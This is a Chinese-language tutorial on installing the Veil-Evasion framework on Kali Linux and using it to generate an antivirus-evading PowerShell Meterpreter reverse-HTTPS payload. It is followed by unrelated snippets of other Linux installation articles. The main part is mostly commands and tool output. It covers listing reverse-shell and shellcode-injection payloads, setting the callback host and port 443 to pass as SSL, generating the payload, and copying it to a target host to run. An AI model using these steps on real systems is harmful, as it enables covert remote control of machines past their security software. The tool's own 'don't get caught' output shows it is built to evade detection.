Kali Linux下Veil安装与使用的方法

Veil是一款绕过杀毒软件的payload生成器,今天我将给大家分享如何安装,安装方法有以下几种,

一、通过建立目录 从Git下载源码安装,

sudo apt-get -y install git
git clone https://github.com/Veil-Framework/Veil-Evasion.git
cd veil-Evasion/
bash setup/setup.sh –s
 

源码下载完成,切换到Setup目录,运行bash脚本进行安装,所有过程全部默认即可。
二、通过apt-get install 安装root@kali:/# apt-get install veil
正在读取软件包列表… 完成
正在分析软件包的依赖关系树      
正在读取状态信息… 完成      
下列软件包是自动安装的并且现在不需要了:
  python-bitarray python-bloomfilter
Use ‘apt-get autoremove’ to remove them.
将会安装下列额外的软件包:
  veil-evasion
下列【新】软件包将被安装:
  veil veil-evasion
升级了 0 个软件包,新安装了 2 个软件包,要卸载 0 个软件包,有 43 个软件包未被升级。
需要下载 5,367 kB 的软件包。
解压缩后会消耗掉 16.5 MB 的额外空间。
您希望继续执行吗?[Y/n]y
获取:1 http://mirrors.ustc.edu.cn/kali/ kali/main veil-evasion amd64 2.20-0kali1 [5,360 kB]
获取:2 http://mirrors.ustc.edu.cn/kali/ kali/main veil amd64 2.20-0kali1 [6,570 B]                                                                                                          
下载 5,367 kB,耗时 6秒 (782 kB/s)                                                                                                                                                           
Selecting previously unselected package veil-evasion.
(正在读取数据库 … 系统当前共安装有 340231 个文件和目录。)
正在解压缩 veil-evasion (从 …/veil-evasion_2.20-0kali1_amd64.deb) …
Selecting previously unselected package veil.
正在解压缩 veil (从 …/veil_2.20-0kali1_amd64.deb) …
正在设置 veil-evasion (2.20-0kali1) …
正在设置 veil (2.20-0kali1) …

三、启动并简单使得切换至安装目录 ,或者任意终端输入veil 即可运行列出所有模块:

[menu>>]: lists
=========================================================================
 Veil-Evasion | [Version]: 2.22.1
=========================================================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

 [*] Available Payloads:

 1) auxiliary/coldwar_wrapper
 2) auxiliary/pyinstaller_wrapper

 3) c/meterpreter/rev_http 
 4) c/meterpreter/rev_http_service
 5) c/meterpreter/rev_tcp  
 6) c/meterpreter/rev_tcp_service
 7) c/shellcode_inject/flatc

 8) cs/meterpreter/rev_http
 9) cs/meterpreter/rev_https
 10) cs/meterpreter/rev_tcp 
 11) cs/shellcode_inject/base64_substitution
 12) cs/shellcode_inject/virtual

 13) go/meterpreter/rev_http
 14) go/meterpreter/rev_https
 15) go/meterpreter/rev_tcp 
 16) go/shellcode_inject/virtual

 17) native/backdoor_factory
 18) native/hyperion        
 19) native/pe_scrambler    

 20) powershell/meterpreter/rev_http
 21) powershell/meterpreter/rev_https
 22) powershell/meterpreter/rev_tcp
 23) powershell/shellcode_inject/download_virtual
 24) powershell/shellcode_inject/psexec_virtual
 25) powershell/shellcode_inject/virtual

 26) python/meterpreter/bind_tcp
 27) python/meterpreter/rev_http
 28) python/meterpreter/rev_http_contained
 29) python/meterpreter/rev_https
 30) python/meterpreter/rev_https_contained
 31) python/meterpreter/rev_tcp
 32) python/shellcode_inject/aes_encrypt
 33) python/shellcode_inject/aes_encrypt_HTTPKEY_Request
 34) python/shellcode_inject/arc_encrypt
 35) python/shellcode_inject/base64_substitution
 36) python/shellcode_inject/des_encrypt
 37) python/shellcode_inject/download_inject
 38) python/shellcode_inject/flat
 39) python/shellcode_inject/letter_substitution
 40) python/shellcode_inject/pidinject

 41) ruby/meterpreter/rev_http
 42) ruby/meterpreter/rev_http_contained
 43) ruby/meterpreter/rev_https
 44) ruby/meterpreter/rev_https_contained
 45) ruby/meterpreter/rev_tcp
 46) ruby/shellcode_inject/base64
 47) ruby/shellcode_inject/flat

 [menu>>]:
输入ID选择模块:
[menu>>]: 21
=========================================================================
 Veil-Evasion | [Version]: 2.22.1
=========================================================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

 Payload: powershell/meterpreter/rev_https loaded

 Required Options:

 Name   Current Value Description
 ----   ------------- -----------
 LHOST                     IP of the Metasploit handler
 LPORT            8443     Port of the Metasploit handler
 PROXY            N        Use system proxy settings

 Available Commands:

 set          Set a specific option value
 info         Show information about the payload
 options      Show payload's options
 generate     Generate payload
 back         Go to the main menu
 exit         exit Veil-Evasion

 [powershell/meterpreter/rev_https>>]:
 

四、生成Payload我们来设定LHOST和LRORT这两个选项,本例子选择本次局域网中的WindowsXp做为靶机,ip:192.168.34.73 本地端口443(伪装为ssl)所以设定如下:

[powershell/meterpreter/rev_https>>]: set LHOST 192.168.34.220
 [i] LHOST => 192.168.34.220
 [powershell/meterpreter/rev_https>>]: set LPORT 443
 [i] LPORT => 443
 [powershell/meterpreter/rev_https>>]: generate
=========================================================================
 Veil-Evasion | [Version]: 2.22.1
=========================================================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

 [>] Please enter the base name for output files (default is 'payload'): kali-key

 Language:  powershell
 Payload:  powershell/meterpreter/rev_https
 Required Options:      LHOST=192.168.34.220  LPORT=443  PROXY=N
 Payload File:  /usr/share/veil-output/source/kali-key.bat
 Handler File:  /usr/share/veil-output/handlers/kali-key_handler.rc

 [*] Your payload files have been generated, don't get caught!
 [!] And don't submit samples to any online scanner! ?

 [>] Press any key to return to the main menu.
=========================================================================
 Veil-Evasion | [Version]: 2.22.1
=========================================================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

 Main Menu

 47 payloads loaded

 Available Commands:

 use          Use a specific payload
 info         Information on a specific payload
 list         List available payloads
 update       Update Veil-Evasion to the latest version
 clean        Clean out payload folders
 checkvt      Check payload hashes vs. VirusTotal
 exit         Exit Veil-Evasion

 [menu>>]:
通过将生成的Payload复制到目标主机上进行运行

时间: 2024-10-26 06:21:24

Kali Linux下Veil安装与使用的方法的相关文章

Linux下php安装Redis扩展的方法_服务器其它

本文实例讲述了Linux下php安装Redis扩展的方法.分享给大家供大家参考,具体如下: 注意:目录的权限   chomd 777 -R 1.安装redis 下载:https://github.com/nicolasff/phpredis/archive/2.2.4.tar.gz 上传phpredis-2.2.4.tar.gz到/usr/local/src目录 cd /usr/local/src #进入软件包存放目录 tar zxvf phpredis-2.2.4.tar.gz #解压 cd

Linux下PhpMyAdmin安装与安全设置方法

linux下php教程myadmin安装与安全设置方法 phpmyadmin是一套放在服务器端的通过浏览器界面管理的程序,因此,确保其目录安全性十分重要,否则,将导致数据被盗取甚至遭到恶意破坏.下面将详细讲述一般的防范措施. 所谓的phpmyadmin简单的说就是一种mysql教程的管理工具. 透过此一程式,可以直接从web上去管理mysql,不需要到系统上去执行. 安装步骤: 1.取得档案ftp://ohaha.ks.edu.tw/pub/source/php/phpmyadmin_2.0.5

linux下制作安装rpm包的方法

  一.制作rpm包  以rp-pppoe-3.10为列进行制作过程. 1.下载rp-pppoe-3.10.tar.gz [root@localhost home]# pwd /home [root@localhost home]# 2.解压 # tar zxvf rp-pppoe-3.10.tar.gz 3. # cp /home/rp-pppoe-3.10/rp-pppoe.spec /usr/src/redhat/SOURCES/ # cp /home/rp-pppoe-3.10.tar.

在Kali Linux下实战Nmap(网络安全扫描器)

在这第二篇 Kali Linux 文章中, 将讨论称为 'nmap' 的网络工具.虽然 nmap 不是 Kali 下唯一的一个工具,但它是最有用的网络映射工具之一. Nmap, 是 Network Mapper 的缩写,由 Gordon Lyon 维护,并被世界各地许多的安全专业人员使用. 这个工具在 Linux 和 Windows 下都能使用,并且是用命令行驱动的.相对于那些令人害怕的命令行,对于 nmap,在这里有一个美妙的图形化前端叫做 zenmap. 强烈建议个人去学习 nmap 的命令

在 Kali Linux 下实战 Nmap(网络安全扫描器)

第一部分-为初学者准备的 Kali Linux 安装指南 Nmap, 是 Network Mapper 的缩写,由 Gordon Lyon 维护(更多关于 Mr. Lyon 的信息在这里: http://insecure.org/fyodor/) ,并被世界各地许多的安全专业人员使用. 这个工具在 Linux 和 Windows 下都能使用,并且是用命令行驱动的.相对于那些令人害怕的命令行,对于 nmap,在这里有一个美妙的图形化前端叫做 zenmap. 强烈建议个人去学习 nmap 的命令行版

Oracle8i在linux下的安装(中文)

oracle|中文 Oracle8i在linux下的安装(中文)  转摘自flyfox的站点  发布时间:2001年01月04日  详细信息:准备工作--安装Oracle服务器 我认为Microsoft Windows是个不错的操作系统,它在市场方面获得了空前的成功,并造就了盖茨.巴尔默等百亿富翁.它简单易用,得到了广泛地普及,几乎每个计算机爱好者都会操作Windows,几乎每个程序员都会Windows编程.目前为了占领市场,排挤Linux,Windows2000在PC的预装费用从以前Windo

Linux下软件安装详解

在Windows下安装软件时,只需用鼠标双击软件的安装程序,或者用Zip等解压缩软件解压缩即可安装.在Linux下安装软件对初学者来说,难度高于Windows下软件安装.下面我就详细讲解Linux下如何安装软件. 先来看看Linux软件扩展名.软件后缀为.rpm最初是Red Hat Linux提供的一种包封装格式,现在许多Linux发行版本都使用:后缀为.deb是Debain Linux提供的一种包封装格式:后缀为.tar.gz.tar.Z.tar.bz2或.tgz是使用Unix系统打包工具ta

linux下yum安装软件的常用配置

开门见山,今天来小谈一下linux下yum安装软件的一些常用的配置,Yum(全称为 Yellow dog Updater, Modified)是一个在Fedora和RedHat以及SUSE.CentOS中的Shell前端软件包管理器.基於RPM包管理,能够从指定的服务器(当然也可以是本地)自动下载RPM包并且安装,可以自动处理依赖性关系(很好的优点),并且一次安装所有依赖的软件包,无须繁琐地一次次下载.安装. yum能很好实现一下功能: yum install 软件名 软件安装 yum inst

Linux下编译安装php libevent扩展实例

 这篇文章主要介绍了Linux下编译安装php libevent扩展实例,本文着重讲解了编译过程中一个错误解决方法,需要的朋友可以参考下     原本想尝试一下PHP编写高性能网络服务,需要安装libevent扩展,没想到让人很费了点脑袋 先下载libevent扩展: http://pecl.php.net/package/libevent 解压后,开始编译 代码如下: $ cd libevent-version $ /usr/local/php/bin/phpize $ ./configure